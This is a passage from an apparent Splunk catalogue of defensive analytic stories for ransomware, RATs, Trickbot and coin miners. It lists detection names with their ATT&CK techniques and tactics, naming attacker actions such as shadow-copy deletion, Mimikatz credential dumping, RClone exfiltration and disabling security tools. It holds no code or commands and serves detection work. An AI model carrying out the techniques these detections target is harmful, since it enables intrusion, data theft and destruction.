Persistence, Privilege Escalation

TTP
Rundll32 Create Remote Thread To A Process

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Rundll32 CreateRemoteThread In Browser

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Rundll32 DNSQuery

T1218.011

Rundll32

Defense Evasion

TTP
Rundll32 Process Creating Exe Dll Files

T1218.011

Rundll32

Defense Evasion

TTP
Schedule Task with Rundll32 Command Trigger

T1053

Scheduled Task/Job

Execution, Persistence, Privilege Escalation

TTP
Sqlite Module In Temp Folder

T1005

Data from Local System

Collection

TTP
Suspicious IcedID Regsvr32 Cmdline

T1218.010

Regsvr32

Defense Evasion

TTP
Suspicious IcedID Rundll32 Cmdline

T1218.011

Rundll32

Defense Evasion

TTP
Suspicious Rundll32 PluginInit

T1218.011

Rundll32

Defense Evasion

TTP
WinEvent Scheduled Task Created Within Public Path

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Orangeworm attack group

Detect activities and various techniques associated with the Orangeworm Attack Group, a group that frequently targets the healthcare industry.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-01-22
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
First Time Seen Running Windows Service

T1569.002, T1055, T1106, T1569, T1574.011, T1543.003

Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service

Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation

Anomaly
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 2


Ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to ransomware--spikes in SMB traffic, suspicious wevtutil usage, the presence of common ransomware extensions, and system processes run from unexpected locations, and many others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
7zip CommandLine To SMB Share Path

T1560.001, T1562.007, T1548, T1489, T1490, T1218.003, T1070.004, T1485, T1204, T1020, T1087.002, T1087.001, T1482, T1069.002, T1069.001, T1562.001, T1070.001, T1531, T1569.002, T1059.005, T1070, T1222, T1491, T1574.002, T1027.005, T1546.015, T1048, T1592, T1547.001, T1047, T1112, T1021.002, T1053.005, T1036.003, T1071.001, T1218.007

Archive via Utility, Disable or Modify Cloud Firewall, Abuse Elevation Control Mechanism, Service Stop, Inhibit System Recovery, CMSTP, File Deletion, Data Destruction, User Execution, Automated Exfiltration, Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups, Disable or Modify Tools, Clear Windows Event Logs, Account Access Removal, Service Execution, Visual Basic, Indicator Removal on Host, File and Directory Permissions Modification, Defacement, DLL Side-Loading, Indicator Removal from Tools, Component Object Model Hijacking, Exfiltration Over Alternative Protocol, Gather Victim Host Information, Registry Run Keys / Startup Folder, Windows Management Instrumentation, Modify Registry, SMB/Windows Admin Shares, Scheduled Task, Rename System Utilities, Web Protocols, Msiexec

Collection, Defense Evasion, Privilege Escalation, Defense Evasion, Impact, Impact, Defense Evasion, Defense Evasion, Impact, Execution, Exfiltration, Discovery, Discovery, Discovery, Discovery, Discovery, Defense Evasion, Defense Evasion, Impact, Execution, Execution, Defense Evasion, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Defense Evasion, Privilege Escalation, Persistence, Exfiltration, Reconnaissance, Persistence, Privilege Escalation, Execution, Defense Evasion, Lateral Movement, Execution, Persistence, Privilege Escalation, Defense Evasion, Command And Control, Defense Evasion

Hunting
Allow File And Printing Sharing In Firewall

T1562.007

Disable or Modify Cloud Firewall

Defense Evasion

TTP
Allow Network Discovery In Firewall

T1562.007, T1490, T1562.001, T1491, T1574.002, T1204, T1112, T1218.003

Disable or Modify Cloud Firewall, Inhibit System Recovery, Disable or Modify Tools, Defacement, DLL Side-Loading, User Execution, Modify Registry, CMSTP

Defense Evasion, Impact, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Execution, Defense Evasion, Defense Evasion

TTP
Allow Operation with Consent Admin

T1548

Abuse Elevation Control Mechanism

Privilege Escalation, Defense Evasion

TTP
Attempt To Disable Services

T1489

Service Stop

Impact

TTP
Attempt To delete Services

T1489

Service Stop

Impact

TTP
BCDEdit Failure Recovery Modification

T1490, T1485, T1482, T1021.001, T1486, T1059.003, T1053.005, T1562.001, T1489

Inhibit System Recovery, Data Destruction, Domain Trust Discovery, Remote Desktop Protocol, Data Encrypted for Impact, Windows Command Shell, Scheduled Task, Disable or Modify Tools, Service Stop

Impact, Impact, Discovery, Lateral Movement, Impact, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact

TTP
CMLUA Or CMSTPLUA UAC Bypass

T1218.003

CMSTP

Defense Evasion

TTP
Clear Unallocated Sector Using Cipher App

T1070.004

File Deletion

Defense Evasion

TTP
Common Ransomware Extensions

T1485

Data Destruction

Impact

Hunting
Common Ransomware Notes

T1485

Data Destruction

Impact

Hunting
Conti Common Exec parameter

T1204

User Execution

Execution

TTP
Delete A Net User

T1489

Service Stop

Impact

Anomaly
Delete ShadowCopy With PowerShell

T1490

Inhibit System Recovery

Impact

TTP
Deleting Shadow Copies

T1490, T1070, T1070.001

Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs

Impact, Defense Evasion, Defense Evasion

TTP
Detect RClone Command-Line Usage

T1020

Automated Exfiltration

Exfiltration

TTP
Detect Renamed RClone

T1020

Automated Exfiltration

Exfiltration

Hunting
Detect SharpHound Command-Line Arguments

T1087.002, T1087.001, T1482, T1069.002, T1069.001

Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups

Discovery, Discovery, Discovery, Discovery, Discovery

TTP
Detect SharpHound File Modifications

T1087.002, T1087.001, T1482, T1069.002, T1069.001

Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups

Discovery, Discovery, Discovery, Discovery, Discovery

TTP
Detect SharpHound Usage

T1087.002, T1087.001, T1482, T1069.002, T1069.001

Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups

Discovery, Discovery, Discovery, Discovery, Discovery

TTP
Disable AMSI Through Registry

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disable ETW Through Registry

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disable Logs Using WevtUtil

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Disable Net User Account

T1489

Service Stop

Impact

TTP
Disable Windows Behavior Monitoring

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Excessive Service Stop Attempt

T1489

Service Stop

Impact

Anomaly
Excessive Usage Of Net App

T1531

Account Access Removal

Impact

Anomaly
Excessive Usage Of SC Service Utility

T1569.002

Service Execution

Execution

Anomaly
Execute Javascript With Jscript COM CLSID

T1059.005

Visual Basic

Execution

TTP
Fsutil Zeroing File

T1070

Indicator Removal on Host

Defense Evasion

TTP
ICACLS Grant Command

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Known Services Killed by Ransomware

T1490

Inhibit System Recovery

Impact

TTP
Modification Of Wallpaper

T1491

Defacement

Impact

TTP
Msmpeng Application DLL Side Loading

T1574.002

DLL Side-Loading

Persistence, Privilege Escalation, Defense Evasion

TTP
Permission Modification using Takeown App

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Powershell Disable Security Monitoring

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Powershell Enable SMB1Protocol Feature

T1027.005

Indicator Removal from Tools

Defense Evasion

TTP
Powershell Execute COM Object

T1546.015

Component Object Model Hijacking

Privilege Escalation, Persistence

TTP
Prevent Automatic Repair Mode using Bcdedit

T1490

Inhibit System Recovery

Impact

TTP
Prohibited Network Traffic Allowed

T1048

Exfiltration Over Alternative Protocol

Exfiltration

TTP
Recon AVProduct Through Pwh or WMI

T1592

Gather Victim Host Information

Reconnaissance

TTP
Recursive Delete of Directory In Batch CMD

T1070.004

File Deletion

Defense Evasion

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Remote Process Instantiation via WMI

T1047

Windows Management Instrumentation

Execution

TTP
Resize Shadowstorage Volume

T1489

Service Stop

Impact

TTP
Revil Common Exec Parameter

T1204

User Execution

Execution

TTP
Revil Registry Entry

T1112

Modify Registry

Defense Evasion

TTP
SMB Traffic Spike

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
SMB Traffic Spike - MLTK

T1021.002

SMB/Windows Admin Shares

Lateral Movement

Anomaly
Schtasks used for forcing a reboot

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Spike in File Writes Anomaly
Start Up During Safe Mode Boot

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Suspicious Event Log Service Behavior

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Suspicious Scheduled Task from Public Directory

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

Anomaly
Suspicious wevtutil Usage

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
System Processes Run From Unexpected Locations

T1036.003

Rename System Utilities

Defense Evasion

TTP
TOR Traffic

T1071.001

Web Protocols

Command And Control

TTP
UAC Bypass With Colorui COM Object

T1218.003

CMSTP

Defense Evasion

TTP
USN Journal Deletion

T1070

Indicator Removal on Host

Defense Evasion

TTP
Uninstall App Using MsiExec

T1218.007

Msiexec

Defense Evasion

TTP
Unusually Long Command Line Anomaly
Unusually Long Command Line - MLTK Anomaly
WBAdmin Delete System Backups

T1490

Inhibit System Recovery

Impact

TTP
Wbemprox COM Object Execution

T1218.003

CMSTP

Defense Evasion

TTP
WevtUtil Usage To Clear Logs

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
Wevtutil Usage To Disable Logs

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP
WinEvent Scheduled Task Created Within Public Path

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
WinEvent Scheduled Task Created to Spawn Shell

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Windows Event Log Cleared

T1070.001

Clear Windows Event Logs

Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exfiltration
  • Exploitation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Ransomware cloud

Leverage searches that allow you to detect and investigate unusual activities that might relate to ransomware. These searches include cloud related objects that may be targeted by malicious actors via cloud providers own encryption features.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-10-27
  • Use Case: Advanced Threat Detection

Remcos

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Remcos RAT trojan, including looking for file writes associated with its payload, screencapture, registry modification, UAC bypassed, persistence and data collection..

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-09-23
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Disabling Remote User Account Control

T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543

Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process

Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation

TTP
Executables Or Script Creation In Suspicious Path

T1036

Masquerading

Defense Evasion

TTP
Process Deleting Its Process File Path

T1070

Indicator Removal on Host

Defense Evasion

TTP
Registry Keys Used For Persistence

T1547.001

Registry Run Keys / Startup Folder

Persistence, Privilege Escalation

TTP
Remcos RAT File Creation in Remcos Folder

T1113

Screen Capture

Collection

TTP
Suspicious Image Creation In Appdata Folder

T1113

Screen Capture

Collection

TTP
Suspicious Process File Path

T1543

Create or Modify System Process

Persistence, Privilege Escalation

TTP
Suspicious WAV file in Appdata Folder

T1113

Screen Capture

Collection

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Revil ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Revil ransomware, including looking for file writes associated with Revil, encrypting network shares, deleting shadow volume storage, registry key modification, deleting of security logs, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-06-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Allow Network Discovery In Firewall

T1562.007, T1490, T1562.001, T1491, T1574.002, T1204, T1112, T1218.003

Disable or Modify Cloud Firewall, Inhibit System Recovery, Disable or Modify Tools, Defacement, DLL Side-Loading, User Execution, Modify Registry, CMSTP

Defense Evasion, Impact, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Execution, Defense Evasion, Defense Evasion

TTP
Delete ShadowCopy With PowerShell

T1490

Inhibit System Recovery

Impact

TTP
Disable Windows Behavior Monitoring

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Modification Of Wallpaper

T1491

Defacement

Impact

TTP
Msmpeng Application DLL Side Loading

T1574.002

DLL Side-Loading

Persistence, Privilege Escalation, Defense Evasion

TTP
Powershell Disable Security Monitoring

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Revil Common Exec Parameter

T1204

User Execution

Execution

TTP
Revil Registry Entry

T1112

Modify Registry

Defense Evasion

TTP
Wbemprox COM Object Execution

T1218.003

CMSTP

Defense Evasion

TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Ryuk ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Ryuk ransomware, including looking for file writes associated with Ryuk, Stopping Security Access Manager, DisableAntiSpyware registry key modification, suspicious psexec use, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic
  • Last Updated: 2020-11-06
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
BCDEdit Failure Recovery Modification

T1490, T1485, T1482, T1021.001, T1486, T1059.003, T1053.005, T1562.001, T1489

Inhibit System Recovery, Data Destruction, Domain Trust Discovery, Remote Desktop Protocol, Data Encrypted for Impact, Windows Command Shell, Scheduled Task, Disable or Modify Tools, Service Stop

Impact, Impact, Discovery, Lateral Movement, Impact, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact

TTP
Common Ransomware Extensions

T1485

Data Destruction

Impact

Hunting
Common Ransomware Notes

T1485

Data Destruction

Impact

Hunting
NLTest Domain Trust Discovery

T1482

Domain Trust Discovery

Discovery

TTP
Remote Desktop Network Bruteforce

T1021.001

Remote Desktop Protocol

Lateral Movement

TTP
Remote Desktop Network Traffic

T1021.001

Remote Desktop Protocol

Lateral Movement

Anomaly
Ryuk Test Files Detected

T1486

Data Encrypted for Impact

Impact

TTP
Ryuk Wake on LAN Command

T1059.003

Windows Command Shell

Execution

TTP
Spike in File Writes Anomaly
Suspicious Scheduled Task from Public Directory

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

Anomaly
WBAdmin Delete System Backups

T1490

Inhibit System Recovery

Impact

TTP
WinEvent Scheduled Task Created Within Public Path

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
WinEvent Scheduled Task Created to Spawn Shell

T1053.005

Scheduled Task

Execution, Persistence, Privilege Escalation

TTP
Windows DisableAntiSpyware Registry

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Windows Security Account Manager Stopped

T1489

Service Stop

Impact

TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Lateral Movement
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Samsam ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the SamSam ransomware, including looking for file writes associated with SamSam, RDP brute force attacks, the presence of files with SamSam ransomware extensions, suspicious psexec use, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint, Network_Traffic, Web
  • Last Updated: 2018-12-13
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Attacker Tools On Endpoint

T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190

Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application

Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access

TTP
Batch File Write to System32

T1204.002

Malicious File

Execution

TTP
Common Ransomware Extensions

T1485

Data Destruction

Impact

Hunting
Common Ransomware Notes

T1485

Data Destruction

Impact

Hunting
Deleting Shadow Copies

T1490, T1070, T1070.001

Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs

Impact, Defense Evasion, Defense Evasion

TTP
Detect PsExec With accepteula Flag

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP
Detect Renamed PSExec

T1569.002

Service Execution

Execution

Hunting
Detect attackers scanning for vulnerable JBoss servers

T1082

System Information Discovery

Discovery

TTP
Detect malicious requests to exploit JBoss servers TTP
File with Samsam Extension TTP
Remote Desktop Network Bruteforce

T1021.001

Remote Desktop Protocol

Lateral Movement

TTP
Remote Desktop Network Traffic

T1021.001

Remote Desktop Protocol

Lateral Movement

Anomaly
Samsam Test File Write

T1486

Data Encrypted for Impact

Impact

TTP
Spike in File Writes Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement
  • Reconnaissance


Reference


version: 1


Trickbot

Leverage searches that allow you to detect and investigate unusual activities that might relate to the trickbot banking trojan, including looking for file writes associated with its payload, process injection, shellcode execution and data collection even in LDAP environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-04-20
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Account Discovery With Net App

T1087.002, T1562.001, T1059, T1055, T1204.002, T1548.002, T1112, T1560.001, T1218.005, T1482, T1566.001, T1547.001, T1218.011, T1053, T1005, T1218.010, T1590.005, T1027, T1053.005, T1021.002

Domain Account, Disable or Modify Tools, Command and Scripting Interpreter, Process Injection, Malicious File, Bypass User Account Control, Modify Registry, Archive via Utility, Mshta, Domain Trust Discovery, Spearphishing Attachment, Registry Run Keys / Startup Folder, Rundll32, Scheduled Task/Job, Data from Local System, Regsvr32, IP Addresses, Obfuscated Files or Information, Scheduled Task, SMB/Windows Admin Shares

Discovery, Defense Evasion, Execution, Defense Evasion, Privilege Escalation, Execution, Privilege Escalation, Defense Evasion, Defense Evasion, Collection, Defense Evasion, Discovery, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Execution, Persistence, Privilege Escalation, Collection, Defense Evasion, Reconnaissance, Defense Evasion, Execution, Persistence, Privilege Escalation, Lateral Movement

TTP
Attempt To Stop Security Service

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Cobalt Strike Named Pipes

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Mshta spawning Rundll32 OR Regsvr32 Process

T1218.005

Mshta

Defense Evasion

TTP
Office Application Spawn rundll32 process

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Document Executing Macro Code

T1566.001

Spearphishing Attachment

Initial Access

TTP
Office Product Spawn CMD Process

T1218.005

Mshta

Defense Evasion

TTP
Powershell Remote Thread To Known Windows Process

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Schedule Task with Rundll32 Command Trigger

T1053

Scheduled Task/Job

Execution, Persistence, Privilege Escalation

TTP
Suspicious Rundll32 StartW

T1218.011

Rundll32

Defense Evasion

TTP
Trickbot Named Pipe

T1055

Process Injection

Defense Evasion, Privilege Escalation

TTP
Wermgr Process Connecting To IP Check Web Services

T1590.005

IP Addresses

Reconnaissance

TTP
Wermgr Process Create Executable File

T1027

Obfuscated Files or Information

Defense Evasion

TTP
Wermgr Process Spawned CMD Or Powershell Process

T1059

Command and Scripting Interpreter

Execution

TTP
Write Executable in SMB Share

T1021.002

SMB/Windows Admin Shares

Lateral Movement

TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Lateral Movement
  • Reconnaissance


Reference


version: 1


Unusual processes

Quickly identify systems running new or unusual processes in your environment that could be indicators of suspicious activity. Processes run from unusual locations, those with conspicuously long command lines, and rare executables are all examples of activities that may warrant deeper investigation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Attacker Tools On Endpoint

T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190

Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application

Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access

TTP
Credential Extraction indicative of FGDump and CacheDump with s option

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of FGDump and CacheDump with v option

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction indicative of use of Mimikatz modules

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction native Microsoft debuggers peek into the kernel

T1003

OS Credential Dumping

Credential Access

TTP
Credential Extraction native Microsoft debuggers via z command line option

T1003

OS Credential Dumping

Credential Access

TTP
Detect Rare Executables Anomaly
Detect processes used for System Network Configuration Discovery

T1016

System Network Configuration Discovery

Discovery

TTP
First time seen command line argument

T1059, T1117, T1202

Command and Scripting Interpreter, Regsvr32, Indirect Command Execution

Execution, , Defense Evasion

Anomaly
More than usual number of LOLBAS applications in short time period

T1059, T1053

Command and Scripting Interpreter, Scheduled Task/Job

Execution, Execution, Persistence, Privilege Escalation

Anomaly
Rare Parent-Child Process Relationship

T1203, T1059, T1053, T1072

Exploitation for Client Execution, Command and Scripting Interpreter, Scheduled Task/Job, Software Deployment Tools

Execution, Execution, Execution, Persistence, Privilege Escalation, Execution, Lateral Movement

Anomaly
RunDLL Loading DLL By Ordinal

T1218.011

Rundll32

Defense Evasion

TTP
System Processes Run From Unexpected Locations

T1036.003

Rename System Utilities

Defense Evasion

TTP
Unusually Long Command Line Anomaly
Unusually Long Command Line Anomaly
Unusually Long Command Line - MLTK Anomaly
WinRM Spawning a Process

T1190

Exploit Public-Facing Application

Initial Access

TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Denial of Service
  • Exploitation
  • Installation
  • Privilege Escalation


Reference


version: 2


Windows file extension and association abuse

Detect and investigate suspected abuse of file extensions and Windows file associations. Some of the malicious behaviors involved may include inserting spaces before file extensions or prepending the file extension with a different one, among other techniques.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-01-26
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Execution of File with Multiple Extensions

T1036.003, T1127.001, T1218.011, T1127, T1036

Rename System Utilities, MSBuild, Rundll32, Trusted Developer Utilities Proxy Execution, Masquerading

Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion

TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Windows service abuse

Windows services are often used by attackers for persistence and the ability to load drivers or otherwise interact with the Windows kernel. This Analytic Story helps you monitor your environment for indications that Windows services are being modified or created in a suspicious manner.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-11-02
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
First Time Seen Running Windows Service

T1569.002, T1055, T1106, T1569, T1574.011, T1543.003

Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service

Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation

Anomaly
Illegal Service and Process Control via Mimikatz modules

T1055, T1106, T1569

Process Injection, Native API, System Services

Defense Evasion, Privilege Escalation, Execution, Execution

TTP
Illegal Service and Process Control via PowerSploit modules

T1055, T1106, T1569

Process Injection, Native API, System Services

Defense Evasion, Privilege Escalation, Execution, Execution

TTP
Reg exe Manipulating Windows Services Registry Keys

T1574.011

Services Registry Permissions Weakness

Persistence, Privilege Escalation, Defense Evasion

TTP
Sc exe Manipulating Windows Services

T1543.003

Windows Service

Persistence, Privilege Escalation

TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 3


Xmrig

Leverage searches that allow you to detect and investigate unusual activities that might relate to the xmrig monero, including looking for file writes associated with its payload, process command-line, defense evasion (killing services, deleting users, modifying files or folder permission, killing other malware or other coin miner) and hacking tools including Telegram as mean of command and control (C2) to download other files. Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive. (1) Servers and cloud-based (2) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-05-07
  • Use Case: Advanced Threat Detection

Detection Profile

name ID Technique Tactic Type
Attacker Tools On Endpoint

T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190

Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application

Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access

TTP
Attempt To Disable Services

T1489

Service Stop

Impact

TTP
Attempt To delete Services

T1489

Service Stop

Impact

TTP
Delete A Net User

T1489

Service Stop

Impact

Anomaly
Deleting Of Net Users

T1531

Account Access Removal

Impact

TTP
Deny Permission using Cacls Utility

T1222

File and Directory Permissions Modification

Defense Evasion

TTP
Disable Net User Account

T1489

Service Stop

Impact

TTP
Disable Windows App Hotkeys

T1562.001

Disable or Modify Tools

Defense Evasion

TTP
Disabling Net User Account

T1531

Account Access Removal

Impact

TTP
Download Files Using Telegram

T1105

Ingress Tool Transfer

Command And Control

TTP
Enumerate Users Local Group Using Telegram

T1087

Account Discovery

Discovery

TTP
Excessive Attempt To Disable Services

